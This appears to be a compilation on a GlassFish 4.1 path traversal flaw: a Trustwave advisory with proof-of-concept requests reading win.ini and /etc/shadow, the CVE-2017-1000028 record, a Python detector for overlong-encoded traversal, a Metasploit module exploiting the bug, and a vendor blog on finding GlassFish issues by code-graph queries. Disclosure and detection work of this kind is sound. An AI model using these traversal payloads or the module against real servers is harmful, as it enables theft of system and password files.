GlassFish Server Open Source Edition 4.1: 1 vulnerability

CVEdetails.com the ultimate security vulnerability data source


Trustwave SpiderLabs Security Advisory TWSL2015-016:
Path Traversal in Oracle GlassFish Server Open Source Edition

Published: 08/27/2015
Version: 1.0

Vendor: Oracle Corporation (Project sponsored by Oracle)
Product: GlassFish Server Open Source Edition
Version affected: 4.1 and prior versions

Product description:
Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering.

The Administration Console of Oracle GlassFish Server, which listens by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by remote attackers, once authenticated, to access sensitive data on the server.

Finding 1: Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs

#Proof of Concept on Microsoft Windows installation

The authenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass: %C0%2F instead of (/) URL encoding.

Example:

REQUEST
========
GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
Cookie: JSESSIONID=5c47a3575077b014449e17877a0c
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://a.b.c.d:4848/
Host: a.b.c.d:4848

RESPONSE
========
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.8)
Last-Modified: Mon, 12 Jan 2015 10:00:00 GMT
Transfer-Encoding: chunked

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

The response contains the contents of the "win.ini" file, proving that the server allows remote users to download the contents of system files.

#Proof of Concept on Linux installation

Example:

REQUEST
=======
GET /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow/
GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow HTTP/1.1
Host: a.b.c.d:4848
Accept: */*
Accept-Language: en
Connection: close

RESPONSE
========
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.7)
Last-Modified: Tue, 13 Jan 2015 10:00:00 GMT
Date: Tue, 10 Jan 2015 10:00:00 GMT
Connection: close
Content-Length: 1087

root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
TRUNCATED
lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::

Vendor Response:
"We plan to fix this issue in the next major GlassFish Server Open Source Edition release."

Remediation Steps:
No fix is available at this time for the GlassFish Server Open Source Edition release. However, this vulnerability can be mitigated with the use of technologies such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Please note that Oracle GlassFish Server 3.x, which is the current commercial release of GlassFish, is not affected.

Revision History:
01/12/2015 - Vulnerability disclosed to vendor
02/18/2015 - Notified vendor about the updates to TW security policy
05/19/2015 - Ninety-day deadline exceeded
07/14/2015 - Requested status from vendor
07/31/2015 - Requested status from vendor
08/21/2015 - Notified vendor about public disclosure
08/27/2015 - Advisory published

References
1. https://www.owasp.org/index.php/Path_Traversal
2. https://glassfish.java.net/
3. http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.
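The bypass in the advisory works because %c0%af is an overlong two-byte UTF-8 encoding of '/' (and %c0%ae of '.'), so a filter that looks for slashes or dot-dot segments before decoding never sees them. The following is an added Python example, not Trustwave's or GlassFish's code, of the normalisation a WAF rule or a log-review script can apply to request targets: percent-decode, fold overlong sequences to the ASCII byte they encode, resolve dot segments against a virtual root, and flag anything that escapes the root or carries overlong bytes at all. The sample targets are constructed in the shape of the advisory's proof of concept (shorter depth, placeholder file names).

```python
import re
from urllib.parse import unquote_to_bytes

# A two-byte sequence with lead byte C0 or C1 is always an overlong encoding of an
# ASCII code point (0x00-0x7F) and is invalid UTF-8; %c0%af is '/' and %c0%ae is '.'.
OVERLONG_2BYTE = re.compile(rb"[\xc0\xc1][\x80-\xbf]")


def normalize_overlong(raw):
    """Fold each overlong two-byte sequence to the ASCII byte it encodes.
    Returns (folded bytes, number of sequences folded)."""
    def fold(match):
        lead, cont = match.group(0)           # two ints from a 2-byte match
        return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])
    return OVERLONG_2BYTE.subn(fold, raw)


def canonical_path(target):
    """Percent-decode a request target, fold overlong UTF-8, then resolve '.' and
    '..' against a virtual root. Returns (canonical path, findings dict)."""
    raw = unquote_to_bytes(target.split("?", 1)[0])   # drop any query string first
    folded, overlong_count = normalize_overlong(raw)
    text = folded.decode("utf-8", errors="replace")   # genuine UTF-8 survives intact
    parts = text.split("/")
    segments, escaped = [], False
    for seg in parts:
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            else:
                escaped = True    # '..' with nothing left to pop climbs above the root
            continue
        segments.append(seg)
    findings = {
        "overlong_sequences": overlong_count,
        "escapes_root": escaped,
        "has_dotdot": ".." in parts,
    }
    return "/" + "/".join(segments), findings


def classify(target):
    """Verdict for one request target, most severe condition first."""
    canonical, f = canonical_path(target)
    if f["escapes_root"]:
        verdict = "block-traversal"    # resolved path left the served root
    elif f["overlong_sequences"]:
        verdict = "block-overlong"     # invalid encoding has no legitimate use in a URL
    elif f["has_dotdot"]:
        verdict = "review-dotdot"      # stayed inside the root, but worth a look
    else:
        verdict = "allow"
    return verdict, canonical


# Constructed request targets in the shape of the advisory's proof of concept
# (shortened traversal depth; file names are placeholders).
SAMPLE_TARGETS = [
    "/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
    "/theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow",
    "/theme/META-INF/prototype/../json/app.js",
    "/theme/com/sun/example.js",
    "/theme/caf%C3%A9.css",
]

if __name__ == "__main__":
    for t in SAMPLE_TARGETS:
        verdict, canonical = classify(t)
        print(f"{verdict:16} {canonical:36} <- {t}")
```

Note that the check decodes before it inspects, which is the property the vulnerable servlet lacked; a plain substring match on "../" against the raw target would pass every one of the encoded samples.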

CVE-2017-1000028

Detail

Current Description

Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to an authenticated and unauthenticated Directory Traversal vulnerability that can be exploited by issuing a specially crafted HTTP GET request.


Severity

CVSS 3.x (NVD / NIST): Base Score 7.5 HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 2.0 (NVD / NIST): Base Score 5.0 MEDIUM
Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)

Weakness Enumeration

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (source: NIST)


Change History (4 change records)

Modified Analysis by NIST, 5/03/2019 2:27:52 PM
  Changed Reference Type: https://www.exploit-db.com/exploits/45196/
    No Types Assigned -> Exploit, Third Party Advisory, VDB Entry
  Changed Reference Type: https://www.exploit-db.com/exploits/45198/
    No Types Assigned -> Exploit, Third Party Advisory, VDB Entry
  Changed Reference Type: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
    Mailing List, Third Party Advisory -> Exploit, Mailing List, Third Party Advisory

CVE Modified by MITRE, 8/17/2018 6:29:01 AM
  Added Reference: https://www.exploit-db.com/exploits/45198/ [No Types Assigned]

CVE Modified by MITRE, 8/16/2018 6:29:00 AM
  Added Reference: https://www.exploit-db.com/exploits/45196/ [No Types Assigned]

Initial Analysis by NIST, 7/21/2017 11:50:13 AM
  Added CPE Configuration: OR *cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*
  Added CVSS V2: (AV:N/AC:L/Au:N/C:P/I:N/A:N)
  Added CVSS V3: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  Added CWE: CWE-22
  Changed Reference Type: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
    No Types Assigned -> Mailing List, Third Party Advisory

Quick Info

CVE Dictionary Entry: CVE-2017-1000028
NVD Published Date: 07/17/2017
NVD Last Modified: 05/03/2019
Source: MITRE

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
      'Description'    => %q{
        This module exploits an unauthenticated directory traversal vulnerability
        which exists in the administration console of Oracle GlassFish Server 4.1,
        which is listening by default on port 4848/TCP.
      },
      'References'     =>
        [
          ['CVE', '2017-1000028'],
          ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
          ['EDB', '39441']
        ],
      'Author'         =>
        [
          'Trustwave SpiderLabs', # Vulnerability discovery
          'Dhiraj Mishra'         # Metasploit module
        ],
      'DisclosureDate' => 'Aug 08 2015',
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(4848),
        OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
      ])
  end

  def run_host(ip)
    filename  = datastore['FILEPATH']
    # DEPTH copies of the overlong-encoded "../" followed by the requested file
    traversal = "%c0%af.." * datastore['DEPTH'] << filename

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "/theme/META-INF/prototype#{traversal}"
    })

    unless res && res.code == 200
      print_error('Nothing was downloaded')
      return
    end

    vprint_good("#{peer} - #{res.body}")
    path = store_loot(
      'oracle.traversal',
      'text/plain',
      ip,
      res.body,
      filename
    )
    print_good("File saved in: #{path}")
  end
end


We have long had a thesis that when free open-source software projects are forked into commercial versions, then the free open-source version no longer gets the same subsequent level of security updates as the commercial version. Phrased into a question, are the free versions of open-source core products left out in the cold? Earlier this year we were asked by a customer if we could apply our knowledge of open-source security to look at GlassFish Server, a reference implementation for Java EE. Specifically they wanted to know if there were vulnerabilities present in the free GlassFish Open Source Edition that had been patched in the commercial version.

In this post, we disclose vulnerabilities in the open-source version of GlassFish that we discovered using our domain-specific language for identifying vulnerabilities, the Security Graph Language (SGL). These issues were all reported to Oracle on 03 May 2017. We worked through a responsible coordinated disclosure process with them and they have published updates protecting users earlier today. Through our disclosure, 4 new Common Vulnerabilities and Exposures (CVEs) for the Oracle GlassFish Server were credited to us.

GlassFish

GlassFish was first released in 2005 by Sun Microsystems. In 2010, Oracle bought Sun Microsystems and committed to a roadmap which included a commercial version called Oracle GlassFish Server. In 2010, commercial support for the Oracle GlassFish Server was discontinued and replaced by the Oracle WebLogic Server. While commercial support was discontinued, security fixes continue to be released in the Oracle Critical Patch Update (CPU) process for users of the commercial product. Aside from the Oracle GlassFish Server, the other version of GlassFish is known as the GlassFish Open Source Edition, which is the open-source Java EE Reference Implementation.

Security Graph Language (SGL)

The Security Graph Language (SGL) is the industry’s first Domain Specific Language (DSL) designed to identify security issues in open-source code. With SGL, we put the world’s open-source into a graph database and are then able to traverse the graph of software dependencies for any given project.

To provide an illustration, below is an example of finding the Java libraries which could be vulnerable to External Entity Expansion (XXE) attack(s).

let xml_new = method(class_name: within('javax/xml/parsers/DocumentBuilderFactory', 'javax/xml/stream/XMLInputFactory'),
                     method_name: within('newInstance', 'newFactory')) in
let xml_set_feature = method(class_name: 'javax/xml/parsers/DocumentBuilderFactory', method_name: 'setFeature') in
let xml_set_property = method(class_name: 'javax/xml/stream/XMLInputFactory', method_name: 'setProperty') in
let results = xml_new called_by not(union(calls xml_set_feature, xml_set_property)) in
results
# Example of a XXE pattern formed to find similar XXE bugs

SGL empowers us with super-powers to express a security pattern and enumerate the entire graph of libraries with ease.

Issues discovered in open-source GlassFish Server

We found a total of 23 issues in the open-source GlassFish server. Of those 23 issues, 10 were fixed by Oracle, while 13 were not fixed because the affected GlassFish versions are no longer maintained.

Of the 10 fixed issues, 7 had no previous CVE, and all of them affected the latest version of the GlassFish Open Source Edition at the time of discovery.

Disclosure Timeline

4 April 2017 – Discovered 21 direct issues in GlassFish
3 May 2017 – Contacted maintainer
4 May 2017 – Maintainer responded
4 May 2017 – Provided information to the maintainer
6 May 2017 – Tracking number received
2 June 2017 – Contacted maintainer to follow up per our 30-day disclosure policy
7 June 2017 – Maintainer requested an extension
22 June 2017 – Maintainer sought clarification on some issues
22 June 2017 – Provided clarification to maintainer
28 June 2017 – Provided more information to maintainer
13 July 2017 – Sought updates from maintainer
14 July 2017 – Maintainer requested an extension
26 August 2017 – Maintainer provided granular tracking numbers for individual issues
8 September 2017 – Maintainer published GlassFish Open Source Edition 5.0
27 September 2017 – Sought updates from maintainer
28 September 2017 – Maintainer asked for an extension until 17 October 2017
17 October 2017 – Maintainer released October CPU 2017
17 October 2017 – Published details on the issues

The remainder of this post will contain information on all 23 disclosed direct issues.

Summary of Issues

The table below provides an overview of the 10 issues that were fixed through our disclosure.

CVE / NON CVE | Issue Summary | 3.x (Maven) | 3.0.1.x (Oracle) | 3.1.2.x (Oracle) | 4.0.x, 4.1.x (Maven) | 5.0 (Maven)
--- | --- | --- | --- | --- | --- | ---
Non CVE 1 | Information Disclosure via MessageFormat parameters | N.A. | N.A. | N.A. | ✖ | ✓
Non CVE 2 | Cross-Site Scripting (XSS) via configNameSection | ✖ | N.A. | ✓ | ✖ | ✓
Non CVE 3 | Deserialization flaw | ✖ | ✓ | ✓ | ✖ | ✓
Non CVE 4 | Denial of Service (DoS) via file upload requests | ✖ | N.A. | N.A. | ✖ | ✓
Non CVE 5 | Handle Proxy Header (HTTPoxy) in CGISERVLET | ✖ | ✓ | ✓ | ✖ | ✓
Non CVE 6 | Deprecated SSLv3 enabled by default | ✖ | N.A. | N.A. | ✖ | ✓
Non CVE 7 | Security Manager Bypass | ✖ | ✓ | ✓ | ✖ | ✓
CVE-2016-3607 | Remote Code Execution (RCE) via NULL byte injection | ✖ | N.A. | N.A. | ✖ | ✓
CVE-2016-3608 | Directory Traversal via unicode encoding payload | ✖ | N.A. | N.A. | ✖ | ✓
CVE-2016-5477 | Directory Traversal via unicode encoding payload | ✖ | N.A. | N.A. | ✖ | ✓

The remaining 13 issues were not fixed in the Open Source Edition, as they affect versions which are no longer maintained.

CVE / NON CVE | Issue Summary | 3.0.x (Maven) | 3.1.x (Maven) | 3.2.x (Maven)
--- | --- | --- | --- | ---
Non CVE 8, Not fixed | Information Disclosure via error message | N.A. | ✖ | ✖
Non CVE 9, Not fixed | Information Disclosure via server.log | N.A. | ✖ | ✖
CVE-2011-0807 | Remote Code Execution (RCE) via default admin account | ✖ | ✖ | ✖
CVE-2011-1511 | Information Disclosure via TRACE requests | ✖ | ✖ | N.A.
CVE-2011-3559 | Denial of Service (DoS) via range header | ✖ | ✖ | ✖
CVE-2011-5035 | Denial of Service (DoS) via hash table collisions | ✖ | ✖ | ✖
CVE-2012-0081 | Unauthorized creation of Domain via admin-cli | ✖ | ✖ | N.A.
CVE-2012-0104 | Denial of Service (DoS) via conversion of named encoding into Charsets | ✖ | ✖ | ✖
CVE-2012-0550 | Cross-Site Request Forgery (CSRF) via REST component | ✖ | ✖ | ✖
CVE-2012-0551 | Cross-Site Scripting (XSS) via administrator console | ✖ | ✖ | ✖
CVE-2012-3155 | Denial of Service (DoS) via administrator console | ✖ | ✖ | ✖
CVE-2013-1508 | Cross-Site Scripting (XSS) via REST component | ✖ | ✖ | ✖
CVE-2013-1515 | Cross-Site Scripting (XSS) via administration console | ✖ | ✖ | ✖

Credited Common Vulnerabilities and Exposures (CVEs)

From the list of issues above, the following 4 CVEs were credited to us by the maintainers on the commercial version of Oracle GlassFish Server, and these were included in today’s release of the Oracle CPU October 2017.

CVE | Issue Summary
--- | ---
Non CVE 7, CVE-2017-10385 | Security Manager Bypass
Non CVE 3, CVE-2017-10391 | Deserialization flaw
Non CVE 5, CVE-2017-10393 | Handle Proxy Header (HTTPoxy) in CGISERVLET
Non CVE 2, CVE-2017-10400 | Cross-Site Scripting (XSS) via configNameSection

How we discovered these issues

We took several approaches to discover these issues.

One of our approaches was to collect several known bugs from other application servers and test whether GlassFish contained similar bugs. As an example, we used SGL to enumerate a known XXE pattern over the entire call graph of the project.

Security Manager bypass

The issue of Security Manager bypass is not new, and the requirements to introduce this weakness are loose. This issue was also present in a similar application server, Apache Tomcat. To reconstruct an existing issue such as CVE-2016-0763, we can construct an SGL query which contains the vulnerable pattern, like the following:

sgl> let set_global_context = method(class_name: 'org/apache/naming/factory/ResourceLinkFactory', method_name: 'setGlobalContext') in
     let get_security_manager = method(class_name: 'java/lang/System', method_name: 'getSecurityManager') in
     let check_permission = method(class_name: 'java/lang/SecurityManager', method_name: 'checkPermission') in
     set_global_context called_by not(union(calls get_security_manager, calls check_permission))

method(module_name: 'null', class_name: 'org/apache/catalina/core/NamingContextListener', method_name: 'lifecycleEvent', descriptor: '(Lorg/apache/catalina/LifecycleEvent;)')

The query above displays all methods that call the setGlobalContext method and do not make a call to the getSecurityManager and checkPermission methods.

To take it a step further, we can now use the identified method to display all affected libraries by adding a single traversal step, method_in_library.

sgl> set_global_context called_by not(union(calls get_security_manager, calls check_permission)) method_in_library

library(language: 'java', coord1: 'org.glassfish.main.web', coord2: 'web-core', version: '4.1.1')
library(language: 'java', coord1: 'org.glassfish.main.web', coord2: 'web-core', version: '4.0-b72')
library(language: 'java', coord1: 'org.glassfish.main.extras', coord2: 'glassfish-embedded-all', version: '4.1')
library(language: 'java', coord1: 'org.glassfish.main.extras', coord2: 'glassfish-embedded-all', version: '4.1.1')
library(language: 'java', coord1: 'org.glassfish.main.extras', coord2: 'glassfish-embedded-all', version: '4.1.2')
…

The results above were subsequently verified, and we catalogued the vulnerability as “Non CVE 7” in the table above.
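To make the SGL operators used in the Security Manager query above, and in the XXE query earlier in the post, concrete, here is an added Python model that is not the post's own code and not an SGL implementation: a small call graph on which `calls`, `called_by`, `not`, `union` and `method_in_library` are plain set operations. The graph edges, the `example/...` methods and the library mapping are constructed; the real class and method names and the web-core coordinate come from the post's queries and their output. It also adds a strict variant (an assumption of mine, not on the page) that treats the union as an intersection, which surfaces a caller that fetches the SecurityManager but never calls checkPermission and would otherwise count as guarded.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Method:
    class_name: str
    method_name: str


@dataclass
class CallGraph:
    """Constructed stand-in for SGL's graph: call edges plus a method -> library map."""
    edges: dict = field(default_factory=dict)      # Method -> set of Methods it calls
    libraries: dict = field(default_factory=dict)  # Method -> set of 'group:artifact:version'

    def all_methods(self):
        found = set(self.edges)
        for callees in self.edges.values():
            found |= callees
        return found

    def calls(self, targets):
        """SGL `calls t`: every method with a call edge to one of `targets`."""
        return {m for m, callees in self.edges.items() if callees & targets}

    def called_by(self, targets, candidates):
        """SGL `t called_by <set>`: callers of `targets`, restricted to `candidates`."""
        return self.calls(targets) & candidates

    def not_(self, methods):
        """SGL `not(...)`: complement within the whole graph."""
        return self.all_methods() - methods

    def method_in_library(self, methods):
        """SGL `method_in_library`: the libraries that ship any of `methods`."""
        return set().union(*(self.libraries.get(m, set()) for m in methods))


def unguarded_callers(graph, targets, guards, strict=False):
    """The post's shape `t called_by not(union(calls g1, calls g2))`.
    strict=True is an added refinement: a caller counts as guarded only if it
    invokes every guard (intersection instead of union)."""
    guard_sets = [graph.calls({g}) for g in guards]
    guarded = set.intersection(*guard_sets) if strict else set.union(*guard_sets)
    return graph.called_by(targets, graph.not_(guarded))


# --- constructed graph modelled on the post's two queries ----------------------
SET_GLOBAL_CONTEXT = Method("org/apache/naming/factory/ResourceLinkFactory", "setGlobalContext")
GET_SECURITY_MANAGER = Method("java/lang/System", "getSecurityManager")
CHECK_PERMISSION = Method("java/lang/SecurityManager", "checkPermission")
LIFECYCLE_EVENT = Method("org/apache/catalina/core/NamingContextListener", "lifecycleEvent")
GUARDED_INIT = Method("example/GuardedCaller", "init")      # hypothetical: fully guarded
HALF_GUARDED_INIT = Method("example/HalfGuarded", "init")   # hypothetical: fetches the manager only

DBF_NEW_INSTANCE = Method("javax/xml/parsers/DocumentBuilderFactory", "newInstance")
XIF_NEW_FACTORY = Method("javax/xml/stream/XMLInputFactory", "newFactory")
DBF_SET_FEATURE = Method("javax/xml/parsers/DocumentBuilderFactory", "setFeature")
XIF_SET_PROPERTY = Method("javax/xml/stream/XMLInputFactory", "setProperty")
UNSAFE_PARSE = Method("example/XmlLoader", "parse")          # hypothetical: factory never hardened
SAFE_PARSE = Method("example/XmlLoader", "parseHardened")    # hypothetical: sets a property first

GRAPH = CallGraph(
    edges={
        LIFECYCLE_EVENT: {SET_GLOBAL_CONTEXT},
        GUARDED_INIT: {GET_SECURITY_MANAGER, CHECK_PERMISSION, SET_GLOBAL_CONTEXT},
        HALF_GUARDED_INIT: {GET_SECURITY_MANAGER, SET_GLOBAL_CONTEXT},
        UNSAFE_PARSE: {DBF_NEW_INSTANCE},
        SAFE_PARSE: {XIF_NEW_FACTORY, XIF_SET_PROPERTY},
    },
    # library coordinate taken from the post's own query output
    libraries={LIFECYCLE_EVENT: {"org.glassfish.main.web:web-core:4.1.1"}},
)


def security_manager_bypass(strict=False):
    # set_global_context called_by not(union(calls get_security_manager, calls check_permission))
    return unguarded_callers(GRAPH, {SET_GLOBAL_CONTEXT},
                             [GET_SECURITY_MANAGER, CHECK_PERMISSION], strict)


def xxe_candidates():
    # xml_new called_by not(union(calls xml_set_feature, calls xml_set_property))
    return unguarded_callers(GRAPH, {DBF_NEW_INSTANCE, XIF_NEW_FACTORY},
                             [DBF_SET_FEATURE, XIF_SET_PROPERTY])


if __name__ == "__main__":
    print(security_manager_bypass())                           # {lifecycleEvent}
    print(security_manager_bypass(strict=True))                # adds HalfGuarded.init
    print(GRAPH.method_in_library(security_manager_bypass()))  # web-core 4.1.1
    print(xxe_candidates())                                    # {XmlLoader.parse}
```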

Improper Handling of File

Before Java 7 Update 40, file manipulation during Java object deserialization could happen when handling a File object whose path contained a NULL byte. The following SGL query lets us find instances of readObject defined in GlassFish that make a call to java/io/File’s getPath method.

sgl> let glassfish_class = class(regex 'org.glassfish.*') in
     let read_object = method(method_name: 'readObject') in
     let get_path = method(class_name: 'java/io/File', method_name: 'getPath') in
     glassfish_class defines read_object where(calls get_path)

From the result set, we could narrow the results further by adding more known code patterns that introduce a weakness into the project. We found that we could also reach glassfish_class by traversing the graph in the reverse direction.

get_path called_by read_object where(defined_by glassfish_class)

This reduced the number of traversals and let us reach the callers of a method directly instead of tracing calls outward. It is useful for static analysis of callers when a vulnerable method is already known, as the following example demonstrates.

The results from the above query were then catalogued as “CVE-2016-3607”, as they were found to closely match an existing CVE for the commercial Oracle GlassFish Server.

Usage of SSLv3

SSLv3 has been deprecated by the IETF. In GlassFish, there is a method setSsl3Enabled whose default value is true, and as you can see SGL returns the affected versions.

sgl> let set_ssl3_enabled = method(method_name: 'setSsl3Enabled') in
     set_ssl3_enabled called_by method_in_library

...
library(language: 'java', coord1: 'org.glassfish.main.extras', coord2: 'glassfish-embedded-all', version: '4.1')
library(language: 'java', coord1: 'org.glassfish.main.extras', coord2: 'glassfish-embedded-all', version: '4.1.1')
library(language: 'java', coord1: 'org.glassfish.main.extras', coord2: 'glassfish-embedded-all', version: '4.1.2')
library(language: 'java', coord1: 'org.glassfish.main.security', coord2: 'security', version: '4.1')
library(language: 'java', coord1: 'org.glassfish.main.security', coord2: 'security', version: '4.1.1')
library(language: 'java', coord1: 'org.glassfish.security', coord2: 'security', version: '3.1.1-b09')
library(language: 'java', coord1: 'org.glassfish.security', coord2: 'security', version: '3.1.1-b10')
library(language: 'java', coord1: 'org.glassfish.main.security', coord2: 'security', version: '3.1.2')
library(language: 'java', coord1: 'org.glassfish.main.security', coord2: 'security', version: '3.1.2.2')
library(language: 'java', coord1: 'org.glassfish.common', coord2: 'glassfish-mbeanserver', version: '3.1')
library(language: 'java', coord1: 'org.glassfish.common', coord2: 'glassfish-mbeanserver', version: '3.1.1')
library(language: 'java', coord1: 'org.glassfish.common', coord2: 'glassfish-mbeanserver', version: '3.1-b26')
library(language: 'java', coord1: 'org.glassfish.common', coord2: 'glassfish-mbeanserver', version: '3.1-b27')
...

After reviewing the results and confirming that the weakness exists, we catalogued this vulnerability as “Non CVE 6”.

Denial of Service (DoS) via File Upload Requests

We then took an existing vulnerability in the Apache Commons FileUpload library, CVE-2016-3092, and tried to detect all instances which contained this issue, where the constructor did not throw an IllegalArgumentException.

sgl> let multipartstream_init = method(class_name: 'org/apache/catalina/fileupload/MultipartStream', method_name: '<init>',
                                       descriptor: '(Ljava/io/InputStream;[BILorg/apache/catalina/fileupload/MultipartStream$ProgressNotifier;)') in
     let illegal_argument_exception = method(class_name: 'java/lang/IllegalArgumentException', method_name: '<init>',
                                             descriptor: '(Ljava/lang/String;)') in
     multipartstream_init not(calls illegal_argument_exception)

With the above SGL query, we found multiple leads which led us to believe that GlassFish Open Source was similarly affected. With a little further investigation, we concluded that GlassFish Open Source was vulnerable to a Denial of Service (DoS) weakness and catalogued this vulnerability as “Non CVE 4”.

Continuous Security with the Security Graph Language

By expressing software issues as SGL queries, and continuously building up the set of SGL queries, the Security Graph Language becomes an integral part of continuous security, automatically identifying issues as new software gets published.

Similarly, as new SGL queries get expressed, each query is run over the entire world of open-source to collect a result set of issues. The funneled result set obtained by the SGL queries narrows the space of software so that security researchers can efficiently confirm, publish, and produce new security advisories and patches.

Summary

Users of the GlassFish Open Source Edition should update to version 5.0 as soon as possible. Oracle will not be releasing patches for version 3, and will only be releasing fixes for version 4 at a later date.

SGL, together with our knowledge base of vulnerabilities, is proving very powerful for discovering new issues in open-source projects.

Written by Jane